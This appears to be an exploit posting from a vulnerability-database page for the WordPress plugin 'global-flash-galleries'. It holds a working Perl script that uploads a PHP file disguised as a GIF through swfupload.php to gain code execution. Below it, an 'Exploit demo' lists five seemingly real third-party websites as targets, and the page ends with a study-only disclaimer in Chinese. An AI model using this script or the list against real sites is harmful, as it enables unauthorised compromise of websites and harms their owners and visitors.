# Exploit : = = = = = = = = = [Perl] #! /usr/bin/perl use LWP; use HTTP::Request::Common; my ($url, $file) = @ARGV; my $ua = LWP::UserAgent->new(); my $req = POST $url, Content_Type => 'form-data', Content => [ name => $name, galleryselect => 1, # Gallery ID (popup.php) Filedata => [ "$file", "file.php.gif", Content_Type => 'image/gif' ] ]; my $res = $ua->request( $req ); if( $res->is_success ) { print $res->content; } else { print $res->status_line, "\n"; } [Perl] # Exploit demo : = = = = = = = = = http://radiostXan.fm/wp-content/plugins/global-flash-galleries/swfupload.php http://izhairstudioX.ca/wp-content/plugins/global-flash-galleries/swfupload.php http://awb.usahiXdsolo.ac.id/wp-content/plugins/global-flash-galleries/swfupload.php http://minigolfcXourseulles.fr/wp-content/plugins/global-flash-galleries//swfupload.php http://madiro-Xhotel.com/wp-content/plugins/global-flash-galleries/swfupload.php # #### #### #### #### #### #### #### #### # # BY T3rm!nat0r5 # Special Tnx to V1R4N64R ,C4T,HAMIDx9 # E-mail : poya.terminator@gmail.com # #### #### #### #### #### #### #### #### #
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论